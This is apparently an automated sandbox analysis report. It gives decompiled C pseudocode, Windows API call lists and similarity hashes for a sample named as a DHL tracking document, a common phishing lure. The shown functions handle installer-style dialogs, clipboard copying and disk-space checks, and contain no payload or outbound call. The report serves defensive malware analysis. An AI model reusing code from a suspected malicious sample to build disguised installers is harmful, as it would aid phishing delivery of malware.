                    							_t162 = 1;
                    							__eflags = _t95 - 1;
                    							if(_t95 == 1) {
                    								_v60 = _t149;
                    								_v48 = 0x420498;
                    								_v44 = 0xfff;
                    								_a4 = _a8;
                    								do {
                    									_a4 = _a4 - 1;
                    									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                    									__eflags = _a4 - _t149;
                    									_t162 = _t162 + _t98 + 2;
                    								} while (_a4 != _t149);
                    								OpenClipboard(_t149);
                    								EmptyClipboard();
                    								_t101 = GlobalAlloc(0x42, _t162);
                    								_a4 = _t101;
                    								_t163 = GlobalLock(_t101);
                    								do {
                    									_v48 = _t163;
                    									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                    									 *_t164 = 0xa0d;
                    									_t163 = _t164 + 2;
                    									_t149 = _t149 + 1;
                    									__eflags = _t149 - _a8;
                    								} while (_t149 < _a8);
                    								GlobalUnlock(_a4);
                    								SetClipboardData(1, _a4);
                    								CloseClipboard();
                    							}
                    							goto L37;
                    						}
                    						__eflags =  *0x42366c - _t149; // 0x0
                    						if(__eflags == 0) {
                    							ShowWindow( *0x423ea8, 8);
                    							__eflags =  *0x423f2c - _t149; // 0x0
                    							if(__eflags == 0) {
                    								_t112 =  *0x41fc68; // 0x0
                    								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
                    							}
                    							E00403E10(1);
                    							goto L25;
                    						}
                    						 *0x41f860 = 2;
                    						E00403E10(0x78);
                    						goto L20;
                    					} else {
                    						__eflags = _a12 - 0x403;
                    						if(_a12 != 0x403) {
                    							L20:
                    							return E00403E9E(_a8, _a12, _a16);
                    						}
                    						ShowWindow( *0x423670, _t149);
                    						ShowWindow(_t154, 8);
                    						E00403E6C(_t154);
                    						goto L17;
                    					}
                    				}
                    				_v52 = _v52 | 0xffffffff;
                    				_v40 = _v40 | 0xffffffff;
                    				_v60 = 2;
                    				_v56 = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				_t123 =  *0x423eb0; // 0x50f930
                    				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                    				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                    				 *0x423670 = GetDlgItem(_a4, 0x403);
                    				 *0x423668 = GetDlgItem(_a4, 0x3ee);
                    				_t127 = GetDlgItem(_a4, 0x3f8);
                    				 *0x423684 = _t127;
                    				_v8 = _t127;
                    				E00403E6C( *0x423670);
                    				 *0x423674 = E004046C5(4);
                    				 *0x42368c = 0;
                    				GetClientRect(_v8,  &_v28);
                    				_v52 = _v28.right - GetSystemMetrics(0x15);
                    				SendMessageA(_v8, 0x101b, 0,  &_v60);
                    				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                    				if(_a8 >= 0) {
                    					SendMessageA(_v8, 0x1001, 0, _a8);
                    					SendMessageA(_v8, 0x1026, 0, _a8);
                    				}
                    				if(_a12 >= _t149) {
                    					SendMessageA(_v8, 0x1024, _t149, _a12);
                    				}
                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                    				_push(0x1b);
                    				E00403E37(_a4);
                    				if(( *0x423eb8 & 0x00000003) != 0) {
                    					ShowWindow( *0x423670, _t149);
                    					if(( *0x423eb8 & 0x00000002) != 0) {
                    						 *0x423670 = _t149;
                    					} else {
                    						ShowWindow(_v8, 8);
                    					}
                    					E00403E6C( *0x423668);
                    				}
                    				_t158 = GetDlgItem(_a4, 0x3ec);
                    				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                    				if(( *0x423eb8 & 0x00000004) != 0) {
                    					SendMessageA(_t158, 0x409, _t149, _a12);
                    					SendMessageA(_t158, 0x2001, _t149, _a8);
                    				}
                    				goto L37;
                    			}




































                    APIs
                    • GetDlgItem.USER32 ref: 00404FC0
                    • GetDlgItem.USER32 ref: 00404FCF
                    • GetClientRect.USER32 ref: 0040500C
                    • GetSystemMetrics.USER32 ref: 00405014
                    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
                    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
                    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                    • ShowWindow.USER32(?,00000008), ref: 004050B0
                    • GetDlgItem.USER32 ref: 004050D1
                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
                    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
                    • GetDlgItem.USER32 ref: 00404FDE
                      • Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A
                    • GetDlgItem.USER32 ref: 00405123
                    • CreateThread.KERNEL32 ref: 00405131
                    • CloseHandle.KERNEL32(00000000), ref: 00405138
                    • ShowWindow.USER32(00000000), ref: 0040515C
                    • ShowWindow.USER32(00000000,00000008), ref: 00405161
                    • ShowWindow.USER32(00000008), ref: 004051A8
                    • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 004051DA
                    • CreatePopupMenu.USER32 ref: 004051EB
                    • AppendMenuA.USER32 ref: 00405200
                    • GetWindowRect.USER32 ref: 00405213
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
                    • OpenClipboard.USER32(00000000), ref: 00405282
                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                    • GlobalLock.KERNEL32 ref: 0040529B
                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                    • SetClipboardData.USER32 ref: 004052D2
                    • CloseClipboard.USER32 ref: 004052D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                    • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                    • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                    • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                    				struct HWND__* _v8;
                    				struct HWND__* _v12;
                    				signed int _v16;
                    				intOrPtr _v20;
                    				void* _v24;
                    				long _v28;
                    				int _v32;
                    				signed int _v40;
                    				int _v44;
                    				signed int* _v56;
                    				intOrPtr _v60;
                    				signed int _v64;
                    				long _v68;
                    				void* _v72;
                    				intOrPtr _v76;
                    				intOrPtr _v80;
                    				void* _v84;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				struct HWND__* _t182;
                    				intOrPtr _t183;
                    				int _t189;
                    				int _t196;
                    				intOrPtr _t198;
                    				long _t202;
                    				signed int _t206;
                    				signed int _t217;
                    				void* _t220;
                    				void* _t221;
                    				int _t227;
                    				intOrPtr _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t240;
                    				signed int _t242;
                    				signed int _t245;
                    				signed int _t247;
                    				struct HBITMAP__* _t250;
                    				void* _t252;
                    				char* _t268;
                    				signed char _t269;
                    				long _t274;
                    				int _t280;
                    				signed int* _t281;
                    				int _t282;
                    				long _t283;
                    				signed int* _t284;
                    				int _t285;
                    				long _t286;
                    				signed int _t287;
                    				long _t288;
                    				signed int _t291;
                    				int _t294;
                    				signed int _t298;
                    				signed int _t300;
                    				signed int _t302;
                    				intOrPtr _t309;
                    				int* _t310;
                    				void* _t311;
                    				int _t315;
                    				int _t316;
                    				int _t317;
                    				signed int _t318;
                    				void* _t320;
                    				void* _t328;
                    				void* _t331;
                    
                    				_v12 = GetDlgItem(_a4, 0x3f9);
                    				_t182 = GetDlgItem(_a4, 0x408);
                    				_t280 =  *0x423ec8; // 0x50fadc
                    				_t320 = SendMessageA;
                    				_v8 = _t182;
                    				_t183 =  *0x423eb0; // 0x50f930
                    				_t315 = 0;
                    				_v32 = _t280;
                    				_v20 = _t183 + 0x94;
                    				if(_a8 != 0x110) {
                    					L23:
                    					__eflags = _a8 - 0x405;
                    					if(_a8 != 0x405) {
                    						_t289 = _a16;
                    					} else {
                    						_a12 = _t315;
                    						_t289 = 1;
                    						_a8 = 0x40f;
                    						_a16 = 1;
                    					}
                    					__eflags = _a8 - 0x4e;
                    					if(_a8 == 0x4e) {
                    						L28:
                    						__eflags = _a8 - 0x413;
                    						_v16 = _t289;
                    						if(_a8 == 0x413) {
                    							L30:
                    							__eflags =  *0x423eb9 & 0x00000002;
                    							if(( *0x423eb9 & 0x00000002) != 0) {
                    								L41:
                    								__eflags = _v16 - _t315;
                    								if(_v16 != _t315) {
                    									_t232 = _v16;
                    									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                    									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                    										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                    									}
                    									_t233 = _v16;
                    									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                    									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                    										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                    										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                    											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                    											 *_t284 =  *_t284 & 0xffffffdf;
                    											__eflags =  *_t284;
                    										} else {
                    											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                    										}
                    									}
                    								}
                    								goto L48;
                    							}
                    							__eflags = _a8 - 0x413;
                    							if(_a8 == 0x413) {
                    								L33:
                    								__eflags = _a8 - 0x413;
                    								_t289 = 0 | _a8 != 0x00000413;
                    								_t240 = E004046F2(_v8, _a8 != 0x413);
                    								__eflags = _t240 - _t315;
                    								if(_t240 >= _t315) {
                    									_t93 = _t280 + 8; // 0x8
                    									_t310 = _t240 * 0x418 + _t93;
                    									_t289 =  *_t310;
                    									__eflags = _t289 & 0x00000010;
                    									if((_t289 & 0x00000010) == 0) {
                    										__eflags = _t289 & 0x00000040;
                    										if((_t289 & 0x00000040) == 0) {
                    											_t298 = _t289 ^ 0x00000001;
                    											__eflags = _t298;
                    										} else {
                    											_t300 = _t289 ^ 0x00000080;
                    											__eflags = _t300;
                    											if(_t300 >= 0) {
                    												_t298 = _t300 & 0xfffffffe;
                    											} else {
                    												_t298 = _t300 | 0x00000001;
                    											}
                    										}
                    										 *_t310 = _t298;
                    										E0040117D(_t240);
                    										_t242 =  *0x423eb8; // 0x80
                    										_t289 = 1;
                    										_a8 = 0x40f;
                    										_t245 =  !_t242 >> 0x00000008 & 1;
                    										__eflags = _t245;
                    										_a12 = 1;
                    										_a16 = _t245;
                    									}
                    								}
                    								goto L41;
                    							}
                    							_t289 = _a16;
                    							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                    							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                    								goto L41;
                    							}
                    							goto L33;
                    						}
                    						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                    						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                    							goto L48;
                    						}
                    						goto L30;
                    					} else {
                    						__eflags = _a8 - 0x413;
                    						if(_a8 != 0x413) {
                    							L48:
                    							__eflags = _a8 - 0x111;
                    							if(_a8 != 0x111) {
                    								L56:
                    								__eflags = _a8 - 0x200;
                    								if(_a8 == 0x200) {
                    									SendMessageA(_v8, 0x200, _t315, _t315);
                    								}
                    								__eflags = _a8 - 0x40b;
                    								if(_a8 == 0x40b) {
                    									_t220 =  *0x420474;
                    									__eflags = _t220 - _t315;
                    									if(_t220 != _t315) {
                    										ImageList_Destroy(_t220);
                    									}
                    									_t221 =  *0x42048c;
                    									__eflags = _t221 - _t315;
                    									if(_t221 != _t315) {
                    										GlobalFree(_t221);
                    									}
                    									 *0x420474 = _t315;
                    									 *0x42048c = _t315;
                    									 *0x423f00 = _t315;
                    								}
                    								__eflags = _a8 - 0x40f;
                    								if(_a8 != 0x40f) {
                    									L86:
                    									__eflags = _a8 - 0x420;
                    									if(_a8 == 0x420) {
                    										__eflags =  *0x423eb9 & 0x00000001;
                    										if(( *0x423eb9 & 0x00000001) != 0) {
                    											__eflags = _a16 - 0x20;
                    											_t189 = (0 | _a16 == 0x00000020) << 3;
                    											__eflags = _t189;
                    											_t316 = _t189;
                    											ShowWindow(_v8, _t316);
                    											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                    										}
                    									}
                    									goto L89;
                    								} else {
                    									E004011EF(_t289, _t315, _t315);
                    									__eflags = _a12 - _t315;
                    									if(_a12 != _t315) {
                    										E0040140B(8);
                    									}
                    									__eflags = _a16 - _t315;
                    									if(_a16 == _t315) {
                    										L73:
                    										E004011EF(_t289, _t315, _t315);
                    										__eflags =  *0x423ecc - _t315; // 0x2
                    										_v32 =  *0x42048c;
                    										_t196 =  *0x423ec8; // 0x50fadc
                    										_v60 = 0xf030;
                    										_v16 = _t315;
                    										if(__eflags <= 0) {
                    											L84:
                    											InvalidateRect(_v8, _t315, 1);
                    											_t198 =  *0x42367c; // 0x5169b1
                    											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                    											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                    												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
                    											}
                    											goto L86;
                    										} else {
                    											_t142 = _t196 + 8; // 0x50fae4
                    											_t281 = _t142;
                    											do {
                    												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                    												__eflags = _t202 - _t315;
                    												if(_t202 != _t315) {
                    													_t291 =  *_t281;
                    													_v68 = _t202;
                    													__eflags = _t291 & 0x00000001;
                    													_v72 = 8;
                    													if((_t291 & 0x00000001) != 0) {
                    														_t151 =  &(_t281[4]); // 0x50faf4
                    														_v72 = 9;
                    														_v56 = _t151;
                    														_t154 =  &(_t281[0]);
                    														 *_t154 = _t281[0] & 0x000000fe;
                    														__eflags =  *_t154;
                    													}
                    													__eflags = _t291 & 0x00000040;
                    													if((_t291 & 0x00000040) == 0) {
                    														_t206 = (_t291 & 0x00000001) + 1;
                    														__eflags = _t291 & 0x00000010;
                    														if((_t291 & 0x00000010) != 0) {
                    															_t206 = _t206 + 3;
                    															__eflags = _t206;
                    														}
                    													} else {
                    														_t206 = 3;
                    													}
                    													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                    													__eflags = _t294;
                    													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                    													SendMessageA(_v8, 0x1102, _t294, _v68);
                    													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                    												}
                    												_v16 = _v16 + 1;
                    												_t281 =  &(_t281[0x106]);
                    												__eflags = _v16 -  *0x423ecc; // 0x2
                    											} while (__eflags < 0);
                    											goto L84;
                    										}
                    									} else {
                    										_t282 = E004012E2( *0x42048c);
                    										E00401299(_t282);
                    										_t217 = 0;
                    										_t289 = 0;
                    										__eflags = _t282 - _t315;
                    										if(_t282 <= _t315) {
                    											L72:
                    											SendMessageA(_v12, 0x14e, _t289, _t315);
                    											_a16 = _t282;
                    											_a8 = 0x420;
                    											goto L73;
                    										} else {
                    											goto L69;
                    										}
                    										do {
                    											L69:
                    											_t309 = _v20;
                    											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                    											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                    												_t289 = _t289 + 1;
                    												__eflags = _t289;
                    											}
                    											_t217 = _t217 + 1;
                    											__eflags = _t217 - _t282;
                    										} while (_t217 < _t282);
                    										goto L72;
                    									}
                    								}
                    							}
                    							__eflags = _a12 - 0x3f9;
                    							if(_a12 != 0x3f9) {
                    								goto L89;
                    							}
                    							__eflags = _a12 >> 0x10 - 1;
                    							if(_a12 >> 0x10 != 1) {
                    								goto L89;
                    							}
                    							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                    							__eflags = _t227 - 0xffffffff;
                    							if(_t227 == 0xffffffff) {
                    								goto L89;
                    							}
                    							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                    							__eflags = _t283 - 0xffffffff;
                    							if(_t283 == 0xffffffff) {
                    								L54:
                    								_t283 = 0x20;
                    								L55:
                    								E00401299(_t283);
                    								SendMessageA(_a4, 0x420, _t315, _t283);
                    								_a12 = 1;
                    								_a16 = _t315;
                    								_a8 = 0x40f;
                    								goto L56;
                    							}
                    							_t231 = _v20;
                    							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                    							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                    								goto L55;
                    							}
                    							goto L54;
                    						}
                    						goto L28;
                    					}
                    				} else {
                    					 *0x423f00 = _a4;
                    					_t247 =  *0x423ecc; // 0x2
                    					_t285 = 2;
                    					_v28 = 0;
                    					_v16 = _t285;
                    					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
                    					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
                    					 *0x420480 =  *0x420480 | 0xffffffff;
                    					_v24 = _t250;
                    					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
                    					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                    					 *0x420474 = _t252;
                    					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                    					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
                    					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                    						SendMessageA(_v8, 0x111b, 0x10, 0);
                    					}
                    					DeleteObject(_v24);
                    					_t286 = 0;
                    					do {
                    						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                    						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                    							if(_t286 != 0x20) {
                    								_v16 = _t315;
                    							}
                    							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
                    						}
                    						_t286 = _t286 + 1;
                    					} while (_t286 < 0x21);
                    					_t317 = _a16;
                    					_t287 = _v16;
                    					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                    					_push(0x15);
                    					E00403E37(_a4);
                    					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                    					_push(0x16);
                    					E00403E37(_a4);
                    					_t318 = 0;
                    					_t288 = 0;
                    					_t328 =  *0x423ecc - _t318; // 0x2
                    					if(_t328 <= 0) {
                    						L19:
                    						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                    						goto L20;
                    					} else {
                    						_t311 = _v32 + 8;
                    						_v24 = _t311;
                    						do {
                    							_t268 = _t311 + 0x10;
                    							if( *_t268 != 0) {
                    								_v60 = _t268;
                    								_t269 =  *_t311;
                    								_t302 = 0x20;
                    								_v84 = _t288;
                    								_v80 = 0xffff0002;
                    								_v76 = 0xd;
                    								_v64 = _t302;
                    								_v40 = _t318;
                    								_v68 = _t269 & _t302;
                    								if((_t269 & 0x00000002) == 0) {
                    									__eflags = _t269 & 0x00000004;
                    									if((_t269 & 0x00000004) == 0) {
                    										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                    									} else {
                    										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                    									}
                    								} else {
                    									_v76 = 0x4d;
                    									_v44 = 1;
                    									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                    									_v28 = 1;
                    									 *( *0x42048c + _t318 * 4) = _t274;
                    									_t288 =  *( *0x42048c + _t318 * 4);
                    								}
                    							}
                    							_t318 = _t318 + 1;
                    							_t311 = _v24 + 0x418;
                    							_t331 = _t318 -  *0x423ecc; // 0x2
                    							_v24 = _t311;
                    						} while (_t331 < 0);
                    						if(_v28 != 0) {
                    							L20:
                    							if(_v16 != 0) {
                    								E00403E6C(_v8);
                    								_t280 = _v32;
                    								_t315 = 0;
                    								__eflags = 0;
                    								goto L23;
                    							} else {
                    								ShowWindow(_v12, 5);
                    								E00403E6C(_v12);
                    								L89:
                    								return E00403E9E(_a8, _a12, _a16);
                    							}
                    						}
                    						goto L19;
                    					}
                    				}
                    			}


                    APIs
                    • GetDlgItem.USER32 ref: 00404789
                    • GetDlgItem.USER32 ref: 00404796
                    • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004047E2
                    • LoadBitmapA.USER32 ref: 004047F5
                    • SetWindowLongA.USER32 ref: 0040480F
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                    • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                    • DeleteObject.GDI32(?), ref: 0040486F
                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                    • GetWindowLongA.USER32 ref: 004049A9
                    • SetWindowLongA.USER32 ref: 004049B7
                    • ShowWindow.USER32(?,00000005), ref: 004049C8
                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                    • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                    • GlobalFree.KERNEL32 ref: 00404BB4
                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                    • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                    • ShowWindow.USER32(?,00000000), ref: 00404D4A
                    • GetDlgItem.USER32 ref: 00404D55
                    • ShowWindow.USER32(00000000), ref: 00404D5C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 1638840714-813528018
                    • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                    • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                    • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                    • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				struct HWND__* _v12;
                    				long _v16;
                    				long _v20;
                    				char _v24;
                    				long _v28;
                    				char _v32;
                    				intOrPtr _v36;
                    				long _v40;
                    				signed int _v44;
                    				CHAR* _v52;
                    				intOrPtr _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				CHAR* _v68;
                    				void _v72;
                    				char _v76;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t81;
                    				long _t86;
                    				signed char* _t88;
                    				void* _t94;
                    				signed int _t95;
                    				signed short _t113;
                    				signed int _t117;
                    				char* _t122;
                    				intOrPtr _t124;
                    				intOrPtr* _t138;
                    				signed int* _t145;
                    				intOrPtr _t147;
                    				signed int _t148;
                    				signed int _t153;
                    				struct HWND__* _t159;
                    				CHAR* _t162;
                    				int _t163;
                    
                    				_t81 =  *0x41fc68; // 0x0
                    				_v36 = _t81;
                    				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                    				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                    				if(_a8 == 0x40b) {
                    					E0040532A(0x3fb, _t162);
                    					E00405CE3(_t162);
                    				}
                    				if(_a8 != 0x110) {
                    					L8:
                    					if(_a8 != 0x111) {
                    						L20:
                    						if(_a8 == 0x40f) {
                    							L22:
                    							_v8 = _v8 & 0x00000000;
                    							_v12 = _v12 & 0x00000000;
                    							E0040532A(0x3fb, _t162);
                    							if(E00405659(_t180, _t162) == 0) {
                    								_v8 = 1;
                    							}
                    							E00405A85(0x41f460, _t162);
                    							_t145 = 0;
                    							_t86 = E00405DA3(0);
                    							_v16 = _t86;
                    							if(_t86 == 0) {
                    								L31:
                    								E00405A85(0x41f460, _t162);
                    								_t88 = E0040560C(0x41f460);
                    								if(_t88 != _t145) {
                    									 *_t88 =  *_t88 & 0x00000000;
                    								}
                    								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                    									_t153 = _a8;
                    									goto L37;
                    								} else {
                    									_t163 = 0x400;
                    									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                    									_v12 = 1;
                    									goto L38;
                    								}
                    							} else {
                    								if(0 == 0x41f460) {
                    									L30:
                    									_t145 = 0;
                    									goto L31;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                    									if(_t113 != 0) {
                    										break;
                    									}
                    									if(_t145 != 0) {
                    										 *_t145 =  *_t145 & _t113;
                    									}
                    									_t145 = E004055BF(0x41f460) - 1;
                    									 *_t145 = 0x5c;
                    									if(_t145 != 0x41f460) {
                    										continue;
                    									} else {
                    										goto L30;
                    									}
                    								}
                    								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                    								_v12 = 1;
                    								_t145 = 0;
                    								L37:
                    								_t163 = 0x400;
                    								L38:
                    								_t94 = E004046C5(5);
                    								if(_v12 != _t145 && _t153 < _t94) {
                    									_v8 = 2;
                    								}
                    								_t147 =  *0x42367c; // 0x5169b1
                    								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                    									E00404610(0x3ff, 0xfffffffb, _t94);
                    									if(_v12 == _t145) {
                    										SetDlgItemTextA(_a4, _t163, 0x41f450);
                    									} else {
                    										E00404610(_t163, 0xfffffffc, _t153);
                    									}
                    								}
                    								_t95 = _v8;
                    								 *0x423f44 = _t95;
                    								if(_t95 == _t145) {
                    									_v8 = E0040140B(7);
                    								}
                    								if(( *(_v36 + 0x14) & _t163) != 0) {
                    									_v8 = _t145;
                    								}
                    								E00403E59(0 | _v8 == _t145);
                    								if(_v8 == _t145 &&  *0x420484 == _t145) {
                    									E0040420A();
                    								}
                    								 *0x420484 = _t145;
                    								goto L53;
                    							}
                    						}
                    						_t180 = _a8 - 0x405;
